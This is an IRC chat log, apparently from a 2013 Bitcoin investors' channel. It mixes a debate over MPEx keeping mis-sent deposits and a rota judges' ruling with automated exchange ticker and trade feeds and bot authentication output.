agreed Jan 21 23:02:46 you can go to #trilema. Jan 21 23:02:50 other than mircea_popescu's blog Jan 21 23:03:09 i cant read his blog it asks for a fee Jan 21 23:03:21 i'm dependant on google translate Jan 21 23:03:58 lately i write in english, still ? Jan 21 23:04:03 sort of Jan 21 23:04:12 sorry i didn't know you switched Jan 21 23:04:19 but the case is in english Jan 21 23:04:24 mircea_popescu: faq.html, Q23, *definition Jan 21 23:04:26 untranslated Jan 21 23:05:02 i changed like 3 months ago Jan 21 23:05:12 rota peeps - faq q24, whilst not strictly mentioning deposits, isn't this also relevant? Jan 21 23:05:15 23. What will you do about stolen coins ? How will you help the rightful owner ? Jan 21 23:05:15 By defition the rightful owner of any coins is "he who can send them". If you take issue with that, please stick to fiat. You are not ready for Bitcoin yet. Jan 21 23:05:17 haha ty. Jan 21 23:05:19 my bad for not disabling google translate Jan 21 23:05:31 defition lol Jan 21 23:05:41 thios was proofed like 8 times. STILL SPELLING ERRORS IN IT OMG Jan 21 23:06:31 Q23 was addressed markedathome Jan 21 23:06:43 it was never at question who the present owner of the 130 btc was Jan 21 23:06:57 the question was past ownership and fiduciary responsibility Jan 21 23:07:31 throwing the term "fiduciary responsibility" changes things Jan 21 23:07:36 in there Jan 21 23:07:52 I thought it was with two deposits of 130btc and only one order, along with not being able to sign with the originating key. Jan 21 23:07:59 !ticker m S.MPOE Jan 21 23:08:01 [MPEX:S.MPOE] 1D: 0.0005984 / 0.000611 / 0.0006312 (1755603 shares, 1,072.68 BTC), 7D: 0.0005984 / 0.00065107 / 0.00068 (8687621 shares, 5,656.34 BTC), 30D: 0.0005984 / 0.00064545 / 0.00068 (38661110 shares, 24,953.83 BTC) Jan 21 23:08:06 we had him sign from blockchain Jan 21 23:08:11 i new statement Jan 21 23:08:16 *a new statement Jan 21 23:08:30 DEPOSIT|{sum}, where the sum is an integer, written in BTC (note that you can not deposit less than 10 BTC). You will be quoted an exact sum, which you must send to the exchange address (1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx). Don't round anything, the decimals are there to identify you as the beneficiary. You will be credited the full amount. Incoming Bitcoin that doesn't exactly match a quoted sum will be simply kept, r Jan 21 23:08:30 eported as profits and distributed to MPEx shareholders. Jan 21 23:08:33 there, last sentence in red. Jan 21 23:08:39 and bold face. Jan 21 23:08:47 did you just add that Jan 21 23:08:50 anyone see room for misinterpretation ? Jan 21 23:08:51 jcpham yes. Jan 21 23:08:58 it used to be there Jan 21 23:09:01 it was removed Jan 21 23:09:06 and it has now been re-added Jan 21 23:09:08 no i just added it now. Jan 21 23:09:13 ok, ty. Jan 21 23:09:27 i have the type of memory where i read things and usually cannot forget them Jan 21 23:09:35 that sentence was there at one point in time Jan 21 23:09:40 i think you're thinking the old mpoe page faq Jan 21 23:09:42 a similarly worded sentence Jan 21 23:09:45 possibly Jan 21 23:10:04 but yes, the idea was always the same. Jan 21 23:10:10 it would've been the first incarnation of any site you debuted Jan 21 23:10:21 because i read it then Jan 21 23:10:22 jcpham: the q5 syntax deposit doesn't have that addition, the output of the command did. Jan 21 23:10:25 yeah, that. Jan 21 23:10:36 markedathome o right you are Jan 21 23:10:39 i see Jan 21 23:10:41 it was also in the deposit slip, yes. Jan 21 23:10:44 lemme find that Jan 21 23:11:20 i think if you go out of your way to make that sentence known Jan 21 23:11:28 i thought i had been lol. Jan 21 23:11:45 hmm, the deposit slip only says "send this exactly" Jan 21 23:11:54 not to me, not searchable in the faq to the public Jan 21 23:11:56 not until now Jan 21 23:12:18 i was peronally aware of the idea of it, yes Jan 21 23:12:21 [MPEX] [S.MPOE] 134 @ 0.00061495 = 0.0824 BTC [+] Jan 21 23:12:23 [MPEX] [S.MPOE] 26149 @ 0.00061508 = 16.0837 BTC [+] Jan 21 23:12:27 Jan 05 22:13:53 BUT! FOR SRS! I AM KEEPING ROUNDED SUMS! NOOBS BEWARE! Jan 21 23:12:28 liek ? Jan 21 23:12:52 doesn't have mpex deposit so would be difficult to find? Jan 21 23:12:53 oh my bad for missing that sentence on January 5th at 10pm Jan 21 23:13:02 kik Jan 21 23:15:12 kik Jan 21 23:15:13 lol Jan 21 23:15:25 I think that it does show that the rota needs to have area of jusrisdiction and contracts specifically stated, either in the case, the rota site/faq and in nominating the selection of the judges Jan 21 23:16:11 yeah but a large part of the appeal was the philosophical purity of its general open nature Jan 21 23:16:31 once you start trying to prop things with fiat-type arches you'll collapse in fiat mess. Jan 21 23:17:07 ^idealistic are we? Jan 21 23:17:24 then isn't that the jurisdiction, and should be used as the basis? and if so which if any of the ruling matched? Jan 21 23:18:52 thestringpuller when i can afford to be. Jan 21 23:19:04 markedathome hm ? Jan 21 23:23:19 [MPEX] [S.MPOE] 14300 @ 0.00061132 = 8.7419 BTC [-] Jan 21 23:23:21 [MPEX] [S.MPOE] 450 @ 0.00061109 = 0.275 BTC [-] Jan 21 23:28:10 [HAVELOCK] [SDICE] 2 @ 0.5231 = 1.0462 BTC [-] Jan 21 23:29:45 [MPEX] [S.MPOE] 17313 @ 0.00061508 = 10.6489 BTC [+] Jan 21 23:31:09 [HAVELOCK] [SDICE] 3 @ 0.52 = 1.56 BTC [-] Jan 21 23:32:23 mircea_popescu: just because it didn't go your way doesn't mean that didnt happen Jan 21 23:33:33 that ? Jan 21 23:33:52 philosophical purity Jan 21 23:34:10 well obviously a one case of anything is about as meaningless as any other one case of something else Jan 21 23:36:17 for that matter, expectign people to be thrown in a pond supposed to be above and beyond the collected wisdom of a good third of all humans that ever lived is also a bit off. Jan 21 23:36:53 [MPEX] [S.MPOE] 6038 @ 0.00061508 = 3.7139 BTC [+] Jan 21 23:36:55 [MPEX] [S.MPOE] 10962 @ 0.00061536 = 6.7456 BTC [+] Jan 21 23:37:04 again because the 'wisdom' does not suit you, its not invalid Jan 21 23:37:29 the judges ruled that their time was wasted with triviality Jan 21 23:39:12 that's not something rthey can rule. Jan 21 23:39:20 what's this, fantasia ? Jan 21 23:39:36 sure it is, they do in 'fiat' courts every day Jan 21 23:40:22 in fact, judges do whatever it is they feel like, by exposing your internal process to a court of judges you accepted that Jan 21 23:40:27 ahaha! wait, wait. these verdicts, they fail to include payment addresses. Jan 21 23:40:35 o this is going to be even more dramatique. Jan 21 23:41:37 pigeons jcpham http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/#comment-91499 Jan 21 23:42:30 pigeons included his Jan 21 23:42:49 i may say fuck it Jan 21 23:43:17 o i see, i skipped over the last yeah Jan 21 23:43:20 fixing. Jan 21 23:43:53 jcpham someone will sooner or later have to lift the messy rock of btc courts. Jan 21 23:44:06 it's going to be messy, and it's going to be a waste of everyone's time. Jan 21 23:44:20 and until it gets done we will just go on sucking. Jan 21 23:45:05 So, can I use the rota for GIGA.ETF... Jan 21 23:45:54 who are you asking? Jan 21 23:46:42 I don't know. Who's in the rota? How do I start anything? Jan 21 23:46:56 well read up on it neh ? Jan 21 23:47:15 I'll try and find the link I guess Jan 21 23:47:23 normally i would have loved to say yes, but under the circumstances i don't see myself signing. Jan 21 23:47:57 bullshit "claimant is always right and mp is annoying and rich" judgements i don't need a court for, they're a dime a dozen. Jan 21 23:49:27 the judgement wasn't bullshit Jan 21 23:49:31 and it was impartial Jan 21 23:49:36 it makes you look like a fucking angel Jan 21 23:50:07 hey, you judge the case, i judge your judgement. seems logical neh ? Jan 21 23:50:11 Namworld the rota was proposed here: http://trilema.com/2012/the-first-roll-of-judges-december-2012/ Jan 21 23:50:20 Yeah, already found the link Jan 21 23:50:23 thanks Jan 21 23:50:24 k Jan 21 23:50:30 that's the first roll. iirc there's a link to the very short contitution in it Jan 21 23:50:36 my bad Jan 21 23:50:43 the link is in there to the proposal Jan 21 23:51:13 Judicator Jan 21 23:51:17 https://www.litecoinglobal.com/security/S.BBET-PT Jan 21 23:51:19 still like that word with the a- Jan 21 23:52:10 wow great contract on that one Jan 21 23:52:34 you mean ad- ? Jan 21 23:52:44 or that too Jan 21 23:52:47 adj Jan 21 23:53:02 oh of course this too https://www.litecoinglobal.com/security/S.DICE-PT Jan 21 23:53:03 you know i had too google the correct spelling of it Jan 21 23:53:04 Well I wish to use the rota Jan 21 23:53:14 when i intentiaonally mispelled it Jan 21 23:53:18 true story Jan 21 23:53:19 If any votes are held on the underlieing asset then (if practical) a motion will Jan 21 23:53:25 somebody didn't read teh contract Jan 21 23:54:16 underlieing Jan 21 23:54:22 wtf he spells it that way throughout. Jan 21 23:54:27 fwiw i have 0 business relationship with any asset or exchange Jan 21 23:54:34 or any other rota member Jan 21 23:55:19 except i pay you to clean my house topless Jan 21 23:55:24 lol i realized i can't enter rota even if i wanted Jan 21 23:55:38 i'd rule "let mircea screw them, so they prefer coinbr" Jan 21 23:55:57 i cannot benefit from any of this Jan 21 23:56:02 in any way that i'm aware of Jan 21 23:56:15 i'm so fair it hurts Jan 21 23:56:24 you can benefit of the peoples love Jan 21 23:56:40 can i do the queen victoria wave Jan 21 23:57:24 all my assets defuncted themselves Jan 21 23:57:28 all judges should submit photo wearing silly wig Jan 21 23:57:31 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 21 23:57:57 and optionally, gavel in pooper Jan 21 23:58:58 [MPEX] [S.MPOE] 118 @ 0.00061536 = 0.0726 BTC [+] Jan 21 23:59:00 [MPEX] [S.MPOE] 5382 @ 0.00061577 = 3.3141 BTC [+] Jan 22 00:00:22 ;;ticker Jan 22 00:00:23 BTCUSD ticker | Best bid: 16.59819, Best ask: 16.61113, Bid-ask spread: 0.01294, Last trade: 16.56000, 24 hour volume: 59746.03234632, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.33564 Jan 22 00:05:56 [MPEX] [S.MPOE] 11933 @ 0.00061577 = 7.348 BTC [+] Jan 22 00:06:02 [MPEX] [S.MPOE] 9533 @ 0.00061607 = 5.873 BTC [+] Jan 22 00:06:04 [MPEX] [S.MPOE] 17819 @ 0.00061634 = 10.9826 BTC [+] Jan 22 00:06:05 [MPEX] [S.MPOE] 5150 @ 0.00061664 = 3.1757 BTC [+] Jan 22 00:06:07 [MPEX] [S.MPOE] 5465 @ 0.00061701 = 3.372 BTC [+] Jan 22 00:35:09 buildin' up the bidwall :) Jan 22 00:36:34 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Jan 22 00:47:03 !ticker m s.mpoe Jan 22 00:47:05 [MPEX:S.MPOE] 1D: 0.0005984 / 0.000611 / 0.0006312 (1842132 shares, 1,125.55 BTC), 7D: 0.0005984 / 0.00065049 / 0.00068 (8831436 shares, 5,744.80 BTC), 30D: 0.0005984 / 0.00064537 / 0.00068 (38743215 shares, 25,004.04 BTC) Jan 22 00:47:06 [MPEX] [S.MPOE] 13069 @ 0.00061466 = 8.033 BTC [-] Jan 22 00:53:08 ;;ticker Jan 22 00:53:09 BTCUSD ticker | Best bid: 16.75201, Best ask: 16.83000, Bid-ask spread: 0.07799, Last trade: 16.75201, 24 hour volume: 61105.12354761, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.35490 Jan 22 00:55:30 [MPEX] [S.MPOE] 281 @ 0.00061466 = 0.1727 BTC [-] Jan 22 00:55:31 [MPEX] [S.MPOE] 19150 @ 0.00061109 = 11.7024 BTC [-] Jan 22 00:55:33 [MPEX] [S.MPOE] 5330 @ 0.00061 = 3.2513 BTC [-] Jan 22 00:56:51 ;;whois Bugpowder Jan 22 00:56:52 206.241.0.249 - http://webchat.freenode.net (cef100f9@gateway/web/freenode/ip.206.241.0.249) has been on server rowling.freenode.net since 02:06 PM, January 21, 2013 (idle for 56 seconds) and is on #bitcoin-assets. Jan 22 00:56:57 ;;ident Bugpowder Jan 22 00:56:57 Nick 'Bugpowder', with hostmask 'Bugpowder!cef100f9@gateway/web/freenode/ip.206.241.0.249', is not identified. Jan 22 00:57:02 gah Jan 22 00:57:05 ;;getrating Bugpowder Jan 22 00:57:06 WARNING: Currently not authenticated. User Bugpowder, rated since Tue Sep 11 08:01:46 2012. Cumulative rating 4, from 4 total ratings. Received ratings: 4 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Bugpowder Jan 22 00:57:19 [BTCTC] [SYNERGY] 1 @ 0.1101 BTC [-] Jan 22 00:57:21 [BTCTC] [SYNERGY] 5 @ 0.11 = 0.55 BTC [-] Jan 22 00:57:23 [BTCTC] [SYNERGY] 2 @ 0.1002 = 0.2004 BTC [-] Jan 22 00:57:28 1 sec Jan 22 00:58:18 ;;gpg eauth Bugpowder Jan 22 00:58:20 Request successful for user Bugpowder, hostmask Bugpowder!cef100f9@gateway/web/freenode/ip.206.241.0.249. Get your encrypted OTP from http://bitcoin-otc.com/otps/F1573A6B1578A821 Jan 22 00:58:31 gosh, bitcoin needs to slow down Jan 22 00:58:37 I don't want this whole thing to crash again Jan 22 00:58:53 ;;gpg everify freenode:#bitcoin-otc:2af6c752ee03725e9cd95f947a421ec295b32d320671c8ed12788e38 Jan 22 00:58:53 it will, and then recover again and crash again Jan 22 00:58:54 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Jan 22 00:59:20 what do you think it'll reach before it crashes? Jan 22 00:59:31 who knows ? Jan 22 01:00:00 Rollercoaster! Jan 22 01:01:03 fun Jan 22 01:01:52 ;;ticker Jan 22 01:01:52 BTCUSD ticker | Best bid: 16.75001, Best ask: 16.79999, Bid-ask spread: 0.04998, Last trade: 16.75001, 24 hour volume: 61150.26465286, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.35861 Jan 22 01:02:17 [BTCTC] [COGNITIVE] 4 @ 0.4 = 1.6 BTC [+] Jan 22 01:02:47 It raise, raise, raise. Everyone panic buys... suddenly a big roller says "Time to cash in" and sells 300k bitcoins. Jan 22 01:02:55 All the little buyers lose confidence Jan 22 01:03:03 back to low price Jan 22 01:03:23 still seems to be growing overall though Jan 22 01:03:44 august crash recovered pretty quickly Jan 22 01:10:03 [MPEX] [S.MPOE] 17350 @ 0.00061633 = 10.6933 BTC [+] Jan 22 01:32:03 ;;bc,tslb Jan 22 01:32:07 Time since last block: 44 minutes and 39 seconds Jan 22 01:32:18 [MPEX] [S.MPOE] 4496 @ 0.00061348 = 2.7582 BTC [-] Jan 22 01:34:11 [HAVELOCK] [SDICE] 3 @ 0.53 = 1.59 BTC [+] Jan 22 01:35:11 [HAVELOCK] [SDICE] 10 @ 0.545 = 5.45 BTC [+] Jan 22 01:35:45 mpoe is suffering due to the price drop Jan 22 01:35:48 err Jan 22 01:35:50 price increase Jan 22 01:38:10 [HAVELOCK] [SDICE] 2 @ 0.56 = 1.12 BTC [+] Jan 22 01:38:48 [MPEX] [S.MPOE] 4557 @ 0.00061 = 2.7798 BTC [-] Jan 22 01:38:50 [MPEX] [S.MPOE] 7689 @ 0.00060859 = 4.6794 BTC [-] Jan 22 01:38:52 [MPEX] [S.MPOE] 3954 @ 0.00060287 = 2.3837 BTC [-] Jan 22 01:39:10 [HAVELOCK] [SDICE] 1 @ 0.56 BTC [+] Jan 22 01:43:21 [BTCTC] [BTC-BOND] 175 @ 0.01 = 1.75 BTC [+] Jan 22 01:44:26 [MPEX] [S.MPOE] 14404 @ 0.00061105 = 8.8016 BTC [+] Jan 22 01:45:20 people need more BTC-BOND Jan 22 01:49:27 [MPEX] [S.MPOE] 11946 @ 0.00061276 = 7.32 BTC [+] Jan 22 01:55:57 [MPEX] [S.MPOE] 1354 @ 0.00060358 = 0.8172 BTC [-] Jan 22 01:58:20 ;;bc,stats Jan 22 01:58:22 Current Blocks: 217484 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 243 blocks | Next Difficulty In About: 1 day, 20 hours, 24 minutes, and 54 seconds | Next Difficulty Estimate: 2952678.64006960 | Estimated Percent Change: -9.1357567164 Jan 22 01:59:59 [MPEX] [S.MPOE] 2649 @ 0.00061295 = 1.6237 BTC [+] Jan 22 02:00:01 [MPEX] [S.MPOE] 461 @ 0.00060287 = 0.2779 BTC [-] Jan 22 02:00:02 [MPEX] [S.MPOE] 18000 @ 0.00060124 = 10.8223 BTC [-] Jan 22 02:00:04 [MPEX] [S.MPOE] 6685 @ 0.00060072 = 4.0158 BTC [-] Jan 22 02:05:46 [MPEX] [S.MPOE] 7515 @ 0.00060072 = 4.5144 BTC [-] Jan 22 02:05:50 [MPEX] [S.MPOE] 18959 @ 0.00060065 = 11.3877 BTC [-] Jan 22 02:08:41 [MPEX] [S.MPOE] 7800 @ 0.00060199 = 4.6955 BTC [+] Jan 22 02:17:52 jurov: "Obama Begins Inauguration Festivities With Ceremonial Drone Flyover" Jan 22 02:17:55 http://www.theonion.com/articles/obama-begins-inauguration-festivities-with-ceremon,30974/ Jan 22 02:25:02 third judge weighs in on the rota decision Jan 22 02:25:22 a better result for mp Jan 22 02:27:25 yeah. that looks like what I was thinking it should be there abouts Jan 22 02:27:30 heh trend once again blocking buttcointalk Jan 22 02:27:57 The latest tests indicate that this URL contains malicious software or could defraud visitors. Jan 22 02:28:07 latter moar likely Jan 22 02:31:17 [MPEX] [S.MPOE] 4041 @ 0.00060065 = 2.4272 BTC [-] Jan 22 02:31:19 [MPEX] [S.MPOE] 15849 @ 0.00059969 = 9.5045 BTC [-] Jan 22 02:31:39 i was actually thinking like 1% so like 128.7 Jan 22 02:31:49 *shrug* Jan 22 02:32:40 [BTCTC] [RSM] 2 @ 0.009 = 0.018 BTC [+] Jan 22 02:34:21 mpoe record lows Jan 22 02:34:42 !ticker mpex s.mpoe Jan 22 02:34:44 [MPEX:S.MPOE] 1D: 0.0005984 / 0.0006098 / 0.0006312 (1887780 shares, 1,151.18 BTC), 7D: 0.0005984 / 0.00064965 / 0.00068 (9003906 shares, 5,849.43 BTC), 30D: 0.0005984 / 0.00064526 / 0.00068 (38827780 shares, 25,054.16 BTC) Jan 22 02:35:06 yeah record lows are about 100 times lower Jan 22 02:36:57 and recently there has been a lot of buying Jan 22 02:37:26 wasn't there like a block of 10`000`000 at .00062 and .00064 and .00066? Jan 22 02:39:44 anyway, ups and downs right? Jan 22 02:39:53 :] Jan 22 02:41:04 [MPEX] [S.DICE] 1400 @ 0.00527831 = 7.3896 BTC [+] Jan 22 02:41:06 [MPEX] [S.DICE] 2850 @ 0.00527441 = 15.0321 BTC [-] Jan 22 02:41:07 [MPEX] [S.DICE] 704 @ 0.00524041 = 3.6892 BTC [-] Jan 22 02:41:08 [MPEX] [S.DICE] 511 @ 0.0051752 = 2.6445 BTC [-] Jan 22 02:42:42 mircea_popescu i've thought about this more and i think you should simply monetize mistakes Jan 22 02:43:03 make it your perogative to have the first say on refunds and charge a fee Jan 22 02:43:15 to whatever degree makes the mistake fun for you Jan 22 02:43:16 too complex. Jan 22 02:43:49 10btc for any returned funds isn't complex Jan 22 02:43:54 "administrative fee" Jan 22 02:44:09 i would. it would be what i'd gain from this Jan 22 02:44:19 lol so why didn;t you put that in if you would. Jan 22 02:44:21 the right to profit from any and all refunds Jan 22 02:45:35 A novel attack against bitcoin What if someone were to put illegal information into the blockchain itself? Top secret information or magnet links for example. Jan 22 02:45:41 the novel! Jan 22 02:45:48 what if someone were to put a novel in the blockchain ? Jan 22 02:46:22 can information be illegal Jan 22 02:46:45 ;;google illegal number Jan 22 02:46:46 Illegal number - Wikipedia, the free encyclopedia: ; Illegal prime - Wikipedia, the free encyclopedia: ; Just how small is the smallest illegal number? - The Mathematical ...: Jan 22 02:48:07 a blog post denouncing the rota an implementation of the new returned funds fee to protect yourself should suffice ;) Jan 22 02:50:05 heh. Jan 22 02:50:46 so far i'm out what, 150btcs in salaries + all the promotional effort, to make someting Jan 22 02:51:00 and the solution proposed is to tear it down and make something else, this time carefulyl curatedf from the general community ? Jan 22 02:51:59 doesn't sound like a winner. Jan 22 02:52:20 [MPEX] [S.MPOE] 26800 @ 0.00060199 = 16.1333 BTC [+] Jan 22 02:53:24 it was not my intention to shit on you Jan 22 02:55:02 i get it, i get it. Jan 22 02:56:34 lots of places charge a fee to return money Jan 22 02:56:41 penalize the act of return Jan 22 02:56:51 [MPEX] [S.MPOE] 22208 @ 0.00060199 = 13.369 BTC [+] Jan 22 02:57:18 it's like bouncing a check and i think you should insulate yourself from it Jan 22 02:57:29 i'm just gonna insist that peeps step up, take btc seriously etc. Jan 22 02:58:12 but the bounced cheque comparison is possibly valuable. i don't imagine anyone with a bounced cheque failed to argue he made a mistake Jan 22 02:58:34 [MPEX] [S.MPOE] 26400 @ 0.00060172 = 15.8854 BTC [-] Jan 22 02:58:36 [MPEX] [S.MPOE] 1251 @ 0.00059969 = 0.7502 BTC [-] Jan 22 02:58:37 [MPEX] [S.MPOE] 3199 @ 0.00059945 = 1.9176 BTC [-] Jan 22 02:59:34 have you paid wences? Jan 22 03:00:52 not yet. Jan 22 03:01:03 rassah needs to add address so far. Jan 22 03:02:31 [MPEX] [S.MPOE] 19642 @ 0.00060199 = 11.8243 BTC [+] Jan 22 03:02:33 [MPEX] [S.MPOE] 13176 @ 0.00061402 = 8.0903 BTC [+] Jan 22 03:02:35 [MPEX] [S.MPOE] 1682 @ 0.00061633 = 1.0367 BTC [+] Jan 22 03:04:18 i think it is a good argument to have and you should have first choice in returning funds Jan 22 03:04:46 and, if it is your intention to make mistakes punitive in nature Jan 22 03:04:51 charge a return fee Jan 22 03:05:29 [MPEX] [S.BBET] 230 @ 0.00100006 = 0.23 BTC [-] Jan 22 03:18:49 [BTCTC] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [+] Jan 22 03:19:41 jcpham: so you guys got that wences btc signature to verify? Jan 22 03:19:47 i wasn't able to Jan 22 03:22:01 yes i used blockchain.info Jan 22 03:22:19 musta been a newline issue for me Jan 22 03:31:31 they have to add headers. Jan 22 03:37:36 [MPEX] [S.MPOE] 11100 @ 0.0006036 = 6.7 BTC [-] Jan 22 04:07:49 [BTCTC] [BTC-BOND] 300 @ 0.01 = 3 BTC [+] Jan 22 04:16:50 inaba says, "If they are going to take several weeks to ship a mere 300 units, only the first few people will ever see a ROI on their units. " Jan 22 04:17:18 they being avalon Jan 22 04:17:29 presumably somehow bfl customers are fine Jan 22 04:25:29 lol Jan 22 04:26:09 ;;ticker Jan 22 04:26:10 BTCUSD ticker | Best bid: 16.83431, Best ask: 16.90000, Bid-ask spread: 0.06569, Last trade: 16.83431, 24 hour volume: 53490.63449020, 24 hour low: 15.87500, 24 hour high: 16.98000, 24 hour vwap: 16.55290 Jan 22 04:26:15 the alternative, everyone gets one and nobody recoups Jan 22 04:26:21 uhhh Jan 22 04:26:28 its going to be nobody or everybody Jan 22 04:26:42 nobody is going to make any money on asics Jan 22 04:26:47 except maybe people making them Jan 22 04:26:50 or scamming others Jan 22 04:34:22 [MPEX] [S.MPOE] 13644 @ 0.0006036 = 8.2355 BTC [-] Jan 22 04:34:24 [MPEX] [S.MPOE] 7096 @ 0.00061557 = 4.3681 BTC [+] Jan 22 04:38:57 [MPEX] [S.MPOE] 14300 @ 0.00061557 = 8.8027 BTC [+] Jan 22 04:40:14 Sometimes it feels like this wall will NEVER come down... -Berlin, December 1961. Also, tonight looking at clark moody Jan 22 04:48:24 buffett has a very nice piece explaining the economics of capital intensive businesses Jan 22 04:49:31 But the promised benefits from these textile investments were Jan 22 04:49:31 illusory. Many of our competitors, both domestic and foreign, Jan 22 04:49:31 were stepping up to the same kind of expenditures and, once Jan 22 04:49:31 enough companies did so, their reduced costs became the baseline Jan 22 04:49:31 for reduced prices industrywide. Viewed individually, each com- Jan 22 04:49:31 pany's capital investment decision appeared cost-effective and ra- Jan 22 04:49:31 tional; viewed collectively, the decisions neutralized each other and Jan 22 04:49:31 were irrational Gust as happens when each person watching a Jan 22 04:49:31 parade decides he can see a little better if he stands on tiptoes). Jan 22 04:49:31 After each round of investment, all the players had more money in Jan 22 04:49:31 the game and returns remained anemic. Jan 22 04:50:56 [MPEX] [S.MPOE] 7000 @ 0.00059946 = 4.1962 BTC [-] Jan 22 04:50:58 [MPEX] [S.MPOE] 9371 @ 0.00059945 = 5.6174 BTC [-] Jan 22 04:56:24 The basic economic ideas of supply and demand are useful in thinking about capturing value. The common insight is that market equilibrium is where supply and demand intersect. When you analyze a business under this framework, you get one of two options: perfect competition or monopoly. **** BEGIN LOGGING AT Tue Jan 22 07:12:58 2013 Jan 22 07:21:18 [MPEX] [S.MPOE] 8000 @ 0.00060528 = 4.8422 BTC [+] Jan 22 07:31:54 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [+] Jan 22 08:00:44 [MPEX] [S.MPOE] 7086 @ 0.00060433 = 4.2823 BTC [-] Jan 22 08:00:46 [MPEX] [S.MPOE] 34341 @ 0.00060528 = 20.7859 BTC [+] Jan 22 08:04:45 [MPEX] [S.DICE] 1400 @ 0.00530232 = 7.4232 BTC [+] Jan 22 08:11:14 [MPEX] [S.MPOE] 6973 @ 0.00060528 = 4.2206 BTC [+] Jan 22 08:11:16 [MPEX] [S.MPOE] 10227 @ 0.00060629 = 6.2005 BTC [+] Jan 22 08:20:08 ;;ident mircea_popescu Jan 22 08:20:10 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. Jan 22 08:20:14 ;;eauth mircea_popescu Jan 22 08:20:15 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jan 22 08:20:36 [MPEX] [S.DICE] 241 @ 0.00530232 = 1.2779 BTC [+] Jan 22 08:20:37 [MPEX] [S.DICE] 2059 @ 0.00534347 = 11.0022 BTC [+] Jan 22 08:20:42 ;;everify freenode:#bitcoin-otc:adf2d557a738009c9237a79f6f8a8e12147b116ae1b36e362323a298 Jan 22 08:20:45 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jan 22 08:21:56 ;;rate pigeons -1 Killed my baby. http://v.gd/2ZVQQY Jan 22 08:21:58 Rating entry successful. Your rating for user pigeons has changed from 3 to -1. Jan 22 08:36:33 That doesn't seem right. Jan 22 08:36:59 You should simply not accept rota for such cases. Jan 22 08:37:57 New terms are good tho. Jan 22 08:38:33 But you may want to be forgiving in specific cases. Example: amount looks almost accurate. Jan 22 08:38:47 Where two numbers are reversed or one was missing. Jan 22 08:39:13 An occasional typo can popup, which doesn't mean the person didn't read the instructions. Jan 22 08:48:44 [MPEX] [S.MPOE] 33600 @ 0.0006 = 20.16 BTC [-] Jan 22 08:53:57 ya well what can i say. bitcoin stuff needs certainties. Jan 22 08:56:03 No sane jurisdiction allows people to keep funds that were mis-sent/mis-placed to top it. Jan 22 08:56:30 it's how bitcoin works. Jan 22 08:58:19 Irreversible? Maybe. Technically if someone hands you six 20 bills instead of 5 for a 100 payment, it's also irreversible if the other person doesn't hand it over. Both would require forcing the other party to give it back. Jan 22 08:59:20 myeah. absent the possibility of a legal system it'll be interesting how that'll work. Jan 22 08:59:28 i guess smarter people will find a solution at some point. Jan 22 08:59:41 Yes. Jan 22 09:00:15 but yes, this IS horrible news for bitcoin in general. Jan 22 09:00:52 But the fact the usual can hardly not be legally enforced is no reason to not try to apply them. So long as the legislation in question makes sense. Jan 22 09:01:28 It seems to me misplaced/mis-sent funds would apply. Jan 22 09:02:20 i'm really not open to publicly discussing mpex policies anymore. they are what they are and that's that. Jan 22 09:02:37 So be it. Jan 22 09:03:05 I like discussing such things tho Jan 22 09:03:23 I'll have to find something else to spend my idle time. Jan 22 09:03:38 We're pretty much done for today @ BitVPS Jan 22 09:04:28 [MPEX] [S.MPOE] 1014 @ 0.00060629 = 0.6148 BTC [+] Jan 22 09:04:29 [MPEX] [S.MPOE] 27486 @ 0.00060749 = 16.6975 BTC [+] Jan 22 09:06:32 i'd have liked it too, but it's just not practical. mtgox keeps people's money fgor months/takes whatever out of it/etc, Jan 22 09:06:39 dudes rewrite contracts to include ids and whatnot, Jan 22 09:06:58 they piss on the public and guess what ? i'm the one idiot discussing it, so im the only idiot getting it in the teeth. Jan 22 09:07:11 well... there's limits to being an idiot. it's actually much cheaper to be mtgox. Jan 22 09:08:41 [MPEX] [S.MPOE] 1432 @ 0.00060749 = 0.8699 BTC [+] Jan 22 09:08:43 [MPEX] [S.MPOE] 7668 @ 0.00060834 = 4.6648 BTC [+] Jan 22 09:09:08 IDs? The giga.etf thing? Jan 22 09:10:17 or MtGox did that too? Jan 22 09:12:01 I'll assume MtGox did that too considering the context Jan 22 09:23:39 [MPEX] [S.MPOE] 20082 @ 0.00060834 = 12.2167 BTC [+] Jan 22 09:23:41 [MPEX] [S.MPOE] 5950 @ 0.00060873 = 3.6219 BTC [+] Jan 22 09:23:46 [MPEX] [S.MPOE] 438 @ 0.00060979 = 0.2671 BTC [+] Jan 22 09:35:03 [MPEX] [S.MPOE] 8800 @ 0.00060734 = 5.3446 BTC [-] Jan 22 09:40:24 [MPEX] [S.MPOE] 16400 @ 0.0006 = 9.84 BTC [-] Jan 22 09:40:26 [MPEX] [S.MPOE] 15625 @ 0.00059754 = 9.3366 BTC [-] Jan 22 09:44:47 [MPEX] [S.DICE] 428 @ 0.00523613 = 2.2411 BTC [-] Jan 22 09:46:26 Namworld https://bitcointalk.org/index.php?topic=81939.0 that sort of stuff. Jan 22 09:49:12 [MPEX] [S.MPOE] 5475 @ 0.00059754 = 3.2715 BTC [-] Jan 22 09:49:14 [MPEX] [S.MPOE] 5505 @ 0.00059599 = 3.2809 BTC [-] Jan 22 09:49:15 [MPEX] [S.MPOE] 8900 @ 0.00059597 = 5.3041 BTC [-] Jan 22 